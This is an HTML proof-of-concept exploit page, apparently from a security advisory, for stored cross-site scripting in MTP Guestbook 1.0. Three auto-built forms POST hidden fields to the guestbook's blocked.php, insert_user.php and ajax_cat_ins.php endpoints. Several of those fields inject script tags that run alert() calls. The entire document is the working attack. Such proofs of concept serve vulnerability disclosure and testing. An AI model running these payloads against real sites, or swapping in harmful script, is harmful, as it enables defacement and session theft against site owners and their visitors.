&lt;html&gt;
&lt;head&gt;
&lt;title&gt;MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;&lt;center&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/mtp_guestbook/blocked.php&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;simbol&quot; value='&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;add&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #1&quot; /&gt;
&lt;/form&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/mtp_guestbook/insert_user.php&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_city&quot; value='&quot;&gt;&lt;script&gt;alert(2);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_country&quot; value=&quot;MK&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_email&quot; value=&quot;lab@zeroscience.mk&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_fname&quot; value='&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;' /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_pass&quot; value=&quot;thricerpass&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;ins_username&quot; value=&quot;thricer&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #2&quot; /&gt;
&lt;/form&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://www.example.com/mtp_guestbook/ajax_cat_ins.php&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value='&quot;&gt;&lt;script&gt;alert(4);&lt;/script&gt;' /&gt;
&lt;input type=&quot;submit&quot; value=&quot;XSS #3&quot; /&gt;
&lt;/form&gt;
&lt;/center&gt;&lt;/body&gt;
&lt;/html&gt;
